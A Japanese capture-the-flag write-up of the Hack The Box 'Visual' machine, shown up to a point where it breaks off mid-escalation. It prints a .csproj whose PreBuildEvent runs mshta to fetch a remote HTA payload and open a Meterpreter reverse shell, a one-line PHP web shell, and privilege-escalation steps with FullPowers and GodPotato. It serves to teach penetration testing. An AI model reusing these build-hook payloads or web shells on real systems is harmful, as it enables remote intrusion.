初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「Visual」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
今回はRustScanで高速スキャンしてみた。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.234 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.234:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-14 03:53 EDT
Initiating Ping Scan at 03:53
Scanning 10.10.11.234 [4 ports]
Completed Ping Scan at 03:53, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:53
Completed Parallel DNS resolution of 1 host. at 03:53, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 03:53
Scanning 10.10.11.234 [1 port]
Discovered open port 80/tcp on 10.10.11.234
Completed SYN Stealth Scan at 03:53, 0.22s elapsed (1 total ports)
Nmap scan report for 10.10.11.234
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2023-10-14 03:53:08 EDT for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
ポート80が公開されてそう。
実際に80にアクセスしてみると、以下のサイトが見える。
サイト検証
ぺージ下部のほうにURLをPOSTできるフォームを発見できる。
PythonでHTTPサーバを立てて自身のアドレスを打ち込んでみる。
何かBuildしているような表示が出てくる。RepoLinkのPOSTデータだったのでもしかしてレポジトリのビルドをしているのか?
gitの階層表示もでているのでおそらくそうであろう。
ページにも記載されているように.NET6のリポジトリをBuildしていそうなのでWindowsでリポジトリを作成する。
.NET6
Visual Studio 2022
まぁ記載されているようにVisual Studio 2022で作成していきます。
コンソールアプリで作成。
キチンと.NET6を選択します。
作成完了しました。
git
この階層をリポジトリとして外部に公開して、さっきのサイトと通信させます。
よくハマる設定のupdate-server-infoを設定しておきます。
んじゃ通信させます。
ん?あれ?.slnならあるぞ??
あ、commit完全に忘れてました。
これで再度通信させます。
このプロジェクトをBuildして実行ファイルを作成するみたいだ!
このプロジェクトにPayloadを含めて攻撃するのではないかと考察できる。
初期侵入
ChatGPT
ビルドタイミングでのRCE何もわからんのでGPTさんに質問する。
これですね。
ただ実際に試してみるとうまくいきません...ビルド前に実施できるものを聞く。
PreBuild
Visual Stuido 2022で.NET6のプロジェクトを作成すると.csprojのプロジェクトファイルが作成されると思う。これによってプロジェクトに関する色々な設定を行うことが出来る。詳しくは以下を見ればある程度分かると思う。
この中にPreBuildEventというものがある。
このPreBuildEventを設定することでBuildを実行する前にコマンドを実行することが出来る。
ここにRevShell確立が出来るコマンドを叩き込む。
mshta
このプロジェクトファイルに打ち込むコマンドは以下のHackTrickのShellを参考にする。
mshtaのサーバーをMetasploitを利用して立ててリバースシェルを待ち受けることとする。打ち込むコマンドはこのような構成mshta http://webserver/payload.htaを取る。
┌──(root㉿kali)-[~/work]
└─# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search hta_server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/hta_server 2016-10-06 manual No HTA Web Server
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hta_server
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Powershell x86
View the full module info with the info, or info -d command.
設定を投入する。
msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 10.10.14.68:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (10.10.14.68:8080).
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.68:4444
[*] Using URL: http://10.10.14.68:8080/2E1MdaR84iCmK.hta
[*] Server started.
msf6 exploit(windows/misc/hta_server) >
この立てたのサーバーのアドレスをコマンドに渡す。
Payload
実際に作成した.csprojはこのようになる。
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
<PreBuildEvent>
mshta.exe http://10.10.14.68:8080/2E1MdaR84iCmK.hta
</PreBuildEvent>
</PropertyGroup>
</Project>
何度か試したが、<Command>を設定しないで直で記載すると刺さった。
※何度も作成して大変だった。
このPayloadをKaliに移し、Kali上で接続を待ち受ける。
msf6 exploit(windows/misc/hta_server) >
[*] 10.10.11.234 hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.11.234:50537) at 2023-10-14 06:22:40 -0400
msf6 exploit(windows/misc/hta_server) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows VISUAL\enox @ VISUAL 10.10.14.68:4444 -> 10.10.11.234:50537 (10.10.11.234)
msf6 exploit(windows/misc/hta_server) >
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: VISUAL\enox
先ほどと同じようにURLを打ち込むと、htaサーバに接続が来る。
これでShellをゲットできた。UserフラグもこのShellでゲットできる。
横展開
winPeas
winPeasを以下サイトからダウンロードして対象マシンにuploadします。
meterpreter > upload winPEASany.exe
[*] Uploading : /root/work/winPEASany.exe -> winPEASany.exe
[*] Uploaded 2.28 MiB of 2.28 MiB (100.0%): /root/work/winPEASany.exe -> winPEASany.exe
[*] Completed : /root/work/winPEASany.exe -> winPEASany.exe
meterpreter >
shellモードに移行してwinPeasを実行します。
C:\Users\enox\Desktop>.\winPEASany.exe
.\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
...省略
Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\xampp\php\phpunit.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\phpdbg.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\php.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\php-win.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\php-cgi.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\pecl.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\peardev.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\pear.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\pciconf.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\pci.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\deplister.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\windowsXamppPhp\deplister.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\windowsXamppPhp\php-cgi.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\windowsXamppPhp\php-win.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\windowsXamppPhp\php.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\windowsXamppPhp\phpdbg.exe": Everyone [AllAccess]
File Permissions "C:\xampp\php\scripts\pciconf.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\scripts\compatinfo.bat": Everyone [AllAccess]
File Permissions "C:\xampp\php\extras\openssl\openssl.exe": Everyone [AllAccess]
...省略
File Permissions "C:\xampp\xampp-control.exe": Everyone [AllAccess]
File Permissions "C:\xampp\xampp_start.exe": Everyone [AllAccess]
File Permissions "C:\xampp\xampp_stop.exe": Everyone [AllAccess]
File Permissions "C:\xampp\htdocs\uploads\9dedb189cacbbb848c2f38ce455f8c\Visual.exe": Everyone [AllAccess],enox [AllAccess]
File Permissions "C:\xampp\htdocs\uploads\FullPowers.exe": Everyone [AllAccess]
File Permissions "C:\xampp\htdocs\uploads\GodPotato-NET2.exe": Everyone [AllAccess]
File Permissions "C:\xampp\htdocs\uploads\GodPotato-NET35.exe": Everyone [AllAccess]
...省略
上記からC:\xampp\htdocsが大体アクセスできることが見える。ここにWebShellをUploadすることが出来ると考える。xamppを起動しているSPNのShellを奪取できるかもしれないのでUploadしてみる。
Webshell
PHPのwebshellを作成する。
taks_shell.php
<?php echo(system($_GET["cmd"])); ?>
このShellをアップロードします。
meterpreter > dir
Listing: C:\xampp\htdocs
========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2023-06-10 13:32:32 -0400 assets
040777/rwxrwxrwx 0 dir 2023-06-10 13:32:32 -0400 css
100666/rw-rw-rw- 7534 fil 2023-06-10 21:20:46 -0400 index.php
040777/rwxrwxrwx 0 dir 2023-06-10 13:32:32 -0400 js
100666/rw-rw-rw- 1554 fil 2023-06-10 19:17:32 -0400 submit.php
040777/rwxrwxrwx 4096 dir 2023-10-14 06:42:52 -0400 uploads
100666/rw-rw-rw- 4970 fil 2023-06-10 19:11:46 -0400 vs_status.php
meterpreter >
meterpreter > upload taks_shell.php
[*] Uploading : /root/work/taks_shell.php -> taks_shell.php
[*] Uploaded 37.00 B of 37.00 B (100.0%): /root/work/taks_shell.php -> taks_shell.php
[*] Completed : /root/work/taks_shell.php -> taks_shell.php
機能するかコマンドを打ち込みます。
dirコマンドが通ったので、このWebShellは機能してそうです。
ここに先ほどと同様にmshtaのExploitを叩き込みます。
mshta
┌──(root㉿kali)-[~/work]
└─# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use windows/misc/hta_server
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Powershell x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LPORT 4440
LPORT => 4440
msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set SRVPORT 8081
SRVPORT => 8081
msf6 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.68:4440
[*] Using URL: http://10.10.14.68:8081/rX7BasfkSWHWM.hta
[*] Server started.
msf6 exploit(windows/misc/hta_server) >
起動完了。mshta.exe http://10.10.14.68:8081/rX7BasfkSWHWM.htaを叩き込みます。
msf6 exploit(windows/misc/hta_server) >
[*] 10.10.11.234 hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:4440 -> 10.10.11.234:50618) at 2023-10-14 07:10:00 -0400
msf6 exploit(windows/misc/hta_server) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\LOCAL SERVICE @ VISUAL 10.10.14.68:4440 -> 10.10.11.234:50618 (10.10.11.234)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter >
NT AUTHORITY\LOCAL SERVICEのシェルをゲットできた。
権限昇格
local_exploit_suggester
とりあえず無難にやってみる。
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.11.234 - Collecting local exploits for x64/windows...
[*] 10.10.11.234 - 186 exploit checks are being tried...
[+] 10.10.11.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 43 / 43
[*] 10.10.11.234 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
4 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2022_21882_win32k Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
8 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
10 exploit/windows/local/always_install_elevated No The target is not exploitable.
11 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
12 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
13 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
14 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
15 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
16 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
17 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The check raised an exception.
18 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
19 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 10.0.17763.4840
20 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
21 exploit/windows/local/cve_2020_17136 No The check raised an exception.
22 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
23 exploit/windows/local/cve_2021_40449 No The check raised an exception.
24 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
25 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
26 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
27 exploit/windows/local/ikeext_service No The check raised an exception.
28 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
29 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 2016+ (10.0 Build 17763). is not vulnerable
30 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
31 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
32 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
33 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
35 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
36 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
37 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
41 exploit/windows/local/tokenmagic No The target is not exploitable.
42 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
43 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 4443
LPORT => 4443
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.68:4443
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\udUCTAa.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[!] No valid thread handle was captured, exiting!
[+] Executed on target machine.
[+] Deleted C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\udUCTAa.ps1
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_dotnet_profiler) > use exploit/windows/local/cve_2022_21882_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > show options
Module options (exploit/windows/local/cve_2022_21882_win32k):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.68 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 v1803-21H2 x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2022_21882_win32k) > run
[*] Started reverse TCP handler on 10.10.14.68:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 2796 launched.
[*] Reflectively injecting the DLL into 2796...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2022_21882_win32k) >
まぁ色々試してみたり、psをマイグレしたりしてみたがうまくいかなかった。
FullPowers
このシェルの権限を調べてみる。
C:\xampp\htdocs>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NT AUTHORITY\LOCAL SERVICEのユーザにしては権限が少ないように見える。
この状況を調べてみると、以下の記事を見つけられます。
この状況を打破できるツールのFullPowersを利用します。
C:\xampp\htdocs\uploads>.\FullPowers.exe
.\FullPowers.exe
[+] Started dummy thread with id 2052
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
C:\Windows\system32>
偽装できる権限が戻ってきています!SeImpersonatePrivilege、SeAssignPrimaryTokenPrivilegeがあるのでPottatoシリーズを活用できそうですね!!
GodPotato
以下からGodPotatoを落とした後にUploadします。
meterpreter > upload GodPotato-NET4.exe
[*] Uploading : /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
[*] Uploaded 56.00 KiB of 56.00 KiB (100.0%): /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
[*] Completed : /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
meterpreter >
GodPottatoで実行するコマンドは今までと同様のmshtaを利用します。
そのためにまたMetasploitでhta-serverを起動します。
┌──(root㉿kali)-[~]
└─# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
